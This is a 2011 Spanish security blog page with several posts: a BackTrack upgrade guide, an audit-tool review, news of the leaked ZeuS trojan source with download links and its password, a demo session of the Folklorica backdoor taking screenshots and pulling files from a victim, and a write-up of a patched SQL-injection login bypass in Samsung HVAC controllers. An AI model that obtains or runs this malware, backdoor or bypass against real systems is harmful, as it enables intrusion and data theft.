14 mayo 2011

Como actualizar Backtrack 4 a Backtrack 5



Hemos leído en todos los blogs de seguridad que ha salido la versión 5 de la que se ha coronado como mejor distribución de seguridad, con las novedades, links para descargarla, lo bonita que es y todas esas cosas. Pero yo me pregunto ¿cómo actualizo mi vieja backtrack 4 a la nueva y flamante versión?

Fácil, en teoría. La realidad es que es más cómodo reinstalar de cero, además se tarda la cuarta parte. Como siempre, actualizar un sistema operativo da problemas no esperados y en este caso que hay varias versiones de Ubuntu por medio más aún. Lo diré una vez: copia de seguridad. Si se rompe algo, yo no se nada.

Lo primero es instalar la clave del repositorio:

wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O-  \
| apt-key add -

Desinstalar algunos paquetes que darán problemas:

apt-get remove xplico python-scapy scapy firefox-3.0 firefox firefox-3.0-branding 
apt-get remove dradis snort warvox mono-common mono-jit libsmbios-bin
apt-get remove openvas-administrator openvas-cli openvas-client 
apt-get remove openvas-libnasl openvas-libraries openvas-manager openvas-menu 
apt-get remove openvas-plugins openvas-scanner whatweb 
apt-get remove libgl1-mesa-dev mesa-common-dev ophcrack libgnome2-0   

Cambiar el archivo /etc/apt/sources.list:

deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

Descargar la base de datos de paquetes:

apt-get update

Y comenzar la instalación
apt-get dist-upgrade

En mi caso he tenido problemas con dos paquetes más: libimage-exiftool-perl y libssh-4_0 que han parado el dist-upgrade y que tras ejecutar otro apt-get install, se han solucionado:

apt-get install -f

Es posible que tengaís que ejecutar este comando algunas veces más y luego repetir el dist-upgrade, que continuará por donde se quedó.

El kernel no se instala, así que una vez el dist-upgrade diga que no hay más cambios por hacer, toca instalar paquetes:

apt-get install linux-image
apt-get install grub-common grub-pc

Paquetes de KDE:

apt-get install backtrack-kde4-essential backtrack-utils backtrack-wallpapers 
apt-get install backtrack-bash-profile backtrack-bootsplash kdebase-workspace-bin
apt-get install kde-base kde-minimal kde-apps

Para rematar, se pueden comprobar todos los paquetes que ofrece la imagen preinstalada de KDE e instalar los que falten. Muy poco elegante pero eficaz.

wget -q http://pastebin.com/raw.php?i=pJwshYA3 -O paquetes.txt
for i in `awk '/^ii/ {print $2}' paquetes.txt`; do
  apt-get install -y $i
done
Leer más...

13 mayo 2011

Auditoría de Sistemas con Bellator

Para configurar de forma segura un sistema o aplicación, normalmente se siguen las guías que proporciona el fabricante o de alguna organización con prestigio y son adaptadas a las necesidades de cada compañía. En el caso de sistemas Microsoft, se puede recurrir a la serie de documentos que edita el CCN-CERT denominados STIC, sólo para administración pública, NSA o incluso las grandes compañías crean sus propias guías. Algunas de estas guías (Microsoft y las STICs, por ejemplo), además del manual proporcionan ficheros que ayudarán a la configuración de los sistemas Windows, proveyendo el fichero de plantilla de seguridad (.INF)

Ejemplo de plantilla
En el caso de las STICs además, entre otros, incluyen el directorio correspondiente a las plantillas administrativas de configuración del equipo y del usuario (registry.pol).

Plantilla administrativa relativa a Configuración de usuario

Una vez configurados nuestros equipos, se deberían de comprobar con cierta periodicidad que no ha habido ningún cambio. Vamos, que hay que auditar los sistemas con la frecuencia que se estime oportuna. Para facilitar la tediosa tarea de comprobar los parámetros del sistema que previamente se han configurado de forma segura en sistemas Microsoft Windows contamos con la herramienta Bellator.


Bellator es una herramienta muy sencilla que en función de los ficheros de entrada (las plantillas de seguridad -fichero.inf- y administrativas –registry.pol-), comprueba que no ha habido ningún cambio respecto a los ficheros de entrada proporcionados.

La idea es que nada más configurar de forma segura el equipo, se exporte la plantilla de seguridad aplicada (.INF, con secedit /export) y se extraen los ficheros correspondientes a las plantillas administrativas, tanto de equipo (directorio Machine) como de usuario (directorio User) dentro del directorio GroupPolicy.

Con estos ficheros ya se puede auditar el sistema tantas veces como se desee. Como es lógico, con cada cambio sobre el equipo habrá que realizar la misma tarea. Por tanto Bellator comparará los ficheros de entrada con los parámetros configurados sobre la máquina. No compara ficheros, si no que los comprueba sobre la configuración aplicada. Esto es importante porque los ficheros del sistema no se actualizan hasta que no se reinicie, por lo tanto, no se aplican hasta dar este último paso.
Finalizada la comprobación, Bellator proporciona un fichero de texto con las diferencias encontradas y si se desea, con la opción –detail, además proporciona un fichero con todos los datos (tanto los relativos a las plantillas de entrada como los aplicados sobre el sistema).

El informe define dos tipos de diferencias:

  1. "Incorrect” o “Error”, cuando un parámetro no se corresponde con el pasado como input.
  2. "Correct but…”, cuando la diferencia se podría considerar menor, a juicio de su creador y podría pasar una auditoría. Este segundo tipo de errores sólo se dan en la parte relativa a los permisos, y su valoración se basa en que la parte más importe de los permisos se corresponde al tipo de los mismo (lectura, control total, etc.), al grupo o usuario que aplica, propietario y poco más. El resto tiene menor importancia. Pero aun así se muestran por si el auditor los considerase importantes.
Además Bellator tiene otra serie de features, como gusta decir por aquí, interesantes:
  1. Comprobación de hotfix del sistema en función de un fichero de entrada con los KBs que se desean comprobar.
  2. Creación y comprobación de los hashes de un fichero y de un directorio determinado. Basado en SHA-256. No se ha optado por métodos anteriores por tema de colisiones.
  3. Cifrado de informe (RSA-2048). Para entornos hostiles donde más de un departamento tiene permisos de administración sobre los equipos. Se cifra el informe de salida y se hashea los ficheros que toma de entrada. De esta forma se puede comprobar que la auditoría se realiza en función de las plantillas adecuadas y no se modifican estas para falsear los resultados.
  4. Informe en XML. Esta opción emite un fichero en XML con formato Babel Enterprise para su próxima integración.Al tratarse de un ejecutable se puede crear una tarea programada y lanzar las auditarías con la periodicidad deseada. Con la opción –Detail (se añade la fecha al nombre del informe) y con –Message, no aparecería ningún mensaje en pantalla, viene a ser un modo silencioso.
Las opción –FTP y –Share, permite enviar los informes a un servidor FTP (creará una carpeta con el nombre del equipo) o a un recurso compartido (para equipos en dominio).

Opciones de Bellator

Por último decir que Bellator no está pensado para máquinas en dominio aunque se puede utilizar teniendo en cuenta que siempre comprobará la política aplicada en un momento determinado (local) y que la información relativa a usuarios y grupos sólo aplica a los correspondientes a la máquina y no a los del dominio.

Para más detalle sobre la herramienta dirigirse al manual que se encuentra en esta dirección.

Espero que lo disfruten.


Referencias:
[+] Página del proyecto Bellator
[+] Manual de usuario de Bellator en castellano



-----------------------
Contribución gracias a Ricardo Ramos
Leer más...

Happy Birthday Security By Default!!!

12 de Mayo! Una fecha que con cariño guardamos los editores de Security By Default en nuestras agendas y mentes, por coincidir, hace tres años, con el día en que nuestro compañero Yago puso el primer ladrillo de este edificio a modo de post presentación.

Tres años de vida ya, en los que en un principio, pretendíamos aportar lo mejor de nuestro saber hacer en materia de seguridad, lo que vemos en nuestro día a día como profesionales dedicados a ello, se ha convertido, en mayor medida gracias a nuestros agradecidos lectores, en algo más que un hobby.

Cada día, intentamos construir artículos de vuestro interés, tanto a los que nos seguís por RSS, como por email, twitter, por nuestros servicios SbD o los que simplemente tenéis el hábito de visitarnos vía web. Una noticia novedosa, como un post de opinión, de recomendación, el resultado de una labor de investigación curiosa, el análisis de una herramienta, como la presentación de un desarrollo propio, una entrevista de alguien relevante en el mundillo,... si con ello, os logramos mantener un rato absortos leyendo algo que os resulta interesante, divertido o que os dan ganas de opinar y hablar de ello, para nosotros, se cumplen nuestros objetivos e ilusiones!

A lo largo de estos años, los editores hemos visto como el blog sufría el nacimiento de sus primeros dientes de leche, celebrado cuando SbD ha empezado a gatear y estar jubilosos de alegría cuando ha dado sus primeros pasos... 

Actualmente estamos orgullosos de él por haber llegado a ser considerado el mejor Blog de Seguridad Informática en los premios Bitácoras 2010, compitiendo con colegas de blogs tan populares como "Un informático en el lado del mal" o Kriptópolis. Encantados estamos por ser elegidos año tras año como coordinadores del área de seguridad y como organizadores del wargame para Campus Party Valencia así como en la edición Europea. Cada vez, recibimos fascinados peticiones de contribuir en eventos de seguridad en España como RootedCon, promoviendo conferencias, charlas y asistencia a eventos.

Sin duda todo esto ha sido posible a lo largo de estos tres años, gracias a vosotros lectores, a nosotros editores y por supuesto a vosotros Colaboradores, que con vuestras contribuciones lográis aportar conocimiento e interés en campos en los que habéis demostrado estar sobradamente preparados.

A todos vosotros GRACIAS por aportarnos las inyecciones de motivación que hacen posible que Security By Default sea lo que es!

Tenemos la intención de celebrar el tercer onomástico de nuestro blog con vosotros, o al menos unos cuantos. Todavía no tenemos claro si organizaremos una fiesta en algún local, o si simplemente brindaremos con unas cervezas o una cena, pero en cuanto lo hayamos definido, lo haremos público vía Twitter o en el propio blog, así que estad atentos!
Leer más...

11 mayo 2011

El código fuente de ZeuS

Hace unas semanas se hablaba que el código fuente de ZeuS en su versión 2.0.8.9, se había robado y publicado. En algunos foros underground se ofrecía un enlace para descargarlo con contraseña. Pero no la contraseña.

Hoy se ha publicado por completo en la página web: http://lists.krash.in/zeus.rar (backup: http://secby.me/zeussource) y con la contraseña "zeus". Seguro que es debido a la liberación que ha hecho esta mañana Yago de Folklorica 2.0 


Supongo que si antes había miles de variaciones de este bicho, ahora mutará mucho más rápido, poniéndoselo aún más difícil a las compañías antivirus.

La buena noticia es que también puede ser utilizado para estudiarlo y buscar métodos de protección.
Leer más...

Folklorica 2.0

Cada vez más están apareciendo ataques de tipo 'APT' que involucran a compañías bastante importantes, incluso algunas vinculadas directamente con el mundo de la seguridad (Lease HBGary, RSA ...).

La fisonomía de estos ataques suele ser bastante similar, un 0day dirigido hacia personal de la compañía y luego una suerte de backdoor para mantener el acceso.

Por tanto, el estudio de este tipo de herramientas y técnicas cada vez cobra mas interés. Hace tiempo presentábamos 'Folklorica' una backdoor que permitía mantener el acceso en un sistema Windows empleando Internet Explorer como vehículo hacia el exterior, entre sus funcionalidades, cabe destacar:
  • La comunicación cliente<-->servidor lleva una capa de cifrado lo que permite ocultar la actividad
  • Al Emplear Internet Explorer, muchos Firewalls no detectan esa conexión por originarse desde un programa confiable
  • En entornos donde el acceso se realiza mediante Proxy con autenticación, Folklorica sigue siendo efectiva como backdoor.
La anterior versión era una prueba de concepto para intercambiar comandos, en esta nueva versión se ha añadido:
  • Screenshots: Permite obtener una imagen de la pantalla y sacarla hacia el exterior
  • Download de ficheros remotos: Permite mover ficheros hacia el exterior 
En el anterior post publicábamos un vídeo explicando el uso, veamos ahora como sería una sesión con la nueva versión:

$ python server.py

Got Connection ! ('192.168.0.47', 2105)

cmd> screenshot

Screenshot mode

#######

File saved as screenshot.png

cmd> dir

Injecting Command [**]=======>

#######

 El volumen de la unidad V es HD2
 El n�mero de serie del volumen es: 04C0-0640

 Directorio de V:\ietroj\dist



10/05/2011  18:49    <DIR>          .
10/05/2011  18:49    <DIR>          ..
10/05/2011  17:44         5.557.364 ietroj.exe
21/02/2003  05:42           348.160 MSVCR71.dll
18/10/2006  09:18             4.608 w9xpopen.exe

               3 archivos      5.910.132 bytes

               2 dirs   4.318.494.720 bytes libres



cmd> GET MSVCR71.dll

Get mode

#######

File saved as GET MSVCR71.dll


La herramienta se puede descargar de aquí

Leer más...

09 mayo 2011

Una inyección SQL que te dejará helado (CVE-2010-4284)

Todos conocemos ya lo que es una inyección de código SQL (por lo menos si visitas SecurityByDefault asíduamente), su importancia, su cantidad de formas de utilización y explotación, así como el juego que puede dar en según que páginas web. Es una vulnerabilidad antigua, que se puede evitar fácilmente, pero que aún a día de hoy, es posible encontrarla en cualquier tipo de página o sitio, sea de una compañía grande o pequeña.

No sólo se puede utilizar para la extracción de información de una base de datos mediante un conjunto de consultas, también se pueden crear sentencias concretas que permitirían autenticarse en un formulario sin conocer ni usuario ni contraseña, o acceder como un usuario determinado sin necesidad de conocer su contraseña. Que sensación se le queda a uno en el cuerpo cuando, tras introducir el famoso "orunoigualauno" en los campos de un formulario de autenticación y encontrarte con un "Bienvenido al panel del control admin!", ¿verdad?.

Volvamos al motivo de este post, tras esta pequeña introducción: Hoy vamos a hablar de aires acondicionados, ahora que parece que en breve comenzará a apretar el calor by default del verano. Y vamos a hablar de inyecciones SQL en páginas atípicas, como son en paneles de control de dispositivos cerrados, por lo que la implantación de la solución resulta algo más compleja, sobretodo si se sabe que dicho dispositivo se ha implantado físicamente en más de 15 países.

Imaginemos la situación en una casa: si queremos apagar o encender el aire acondicionado, regularlo, controlarlo, hacer que automáticamente se encienda y apague en un determinado momento del día, así como subir o bajar la temperatura bajo demanda, recurrimos al mando a distancia típico. Pero, ¿y si nos encontramos en un edificio de X plantas de una oficina, colegio, universidad o cualquier otro tipo de organización, con un aparato de aire acondicionado por cada departamento, sección, clase o aula? El ir aparato por aparato, con su correspondiente mando, cambiando la configuración o estableciendo los valores de temperatura deseados, puede llegar a ser una tarea ardua. Solidaridad con lo pobres conserjes, por favor.

Para ello, existen dispositivos mediante los cuales es posible monitorizar y administrar un gran número de aparatos de aire acondicionado...cómodamente desde un navegador web...¡como a mi me gustan!

Uno de estos aparatos es el Integrated Management System DMS de la compañía Samsung, y tiene una pinta tal que así:


El diagrama del sistema completo gestionado mediante el DMS es el siguiente:


Entre sus funciones destacan, como no, la gestión centralizada, establecimiento de límites de temperatura, monitorización por equipo, establecer temperaturas por hora (por ejemplo, definir que únicamente funcione con unas características determinadas en una franja horaria que podría ser el horario laboral), distribución de potencia por aparato (y así controlar el gasto energético)...y...la posibilidad de interactuar con el sistema de control de incendios...



Para acceder a tal conjunto de interesantes funcionalidades, únicamente es necesario acceder vía web al dispositivo a través del puerto 80 (como si se tratase de un router adsl normal), y nos encontraremos el siguiente formulario de login:
Sabéis el siguiente paso, tras lo contado en la introducción de este post ¿no?
¿Y qué ocurre?

Estado de todos los dispositivos conectados
Historial de error de todos los aparatos conectados
Estableciendo una "agenda" de acciones para los dispositivos conectados

La sentencia ejecutada en el formulario de autenticación, además de permitirnos entrar en el sistema, nos otorgará los privilegios del primer usuario que aparezca en la tabla de usuarios...¿os podéis imaginar cual puede ser en el siguiente caso? Accedamos al menú de gestión de usuarios del dispositivo:

Gestión de cuentas de usuario para acceso al dispositivo
Control total sobre el dispositivo con lo que ello conlleva, gracias al amplio abanico de funcionalidades que ofrece este dispositivo. No necesitamos saber usuarios y contraseñas por defecto.

Samsung, en coordinación con el ICS-CERT, ha publicado una actualización para esta vulnerabilidad, como se puede ver en el informe de seguridad correspondiente. También podréis consultar la notificación de seguridad ICSA-11-069-01 [PDF] publicada por el propio ICS-CERT. Se recomienda a los usuarios actualizar los sistemas mediante el parche proporcionado por el fabricante.

Vulnerabilidad de inyección SQL que quizás no nos permita extraer información de una base de datos, pero como dice el título, podría dejar helado a tus compañeros de trabajo, aunque también te permitiría hacerles sudar. O quién sabe, si en un momento dado necesitáis una sala de reuniones con la temperatura adecuada para colgar unos buenos jamones...

Referencias:
[+] http://www.kb.cert.org/vuls/id/236668
[+] http://www.securityfocus.com/bid/47746
[+] http://www.us-cert.gov/control_systems/pdf/ICSA-11-069-01.pdf
Leer más...

08 mayo 2011

Enlaces de la SECmana - 70

Leer más...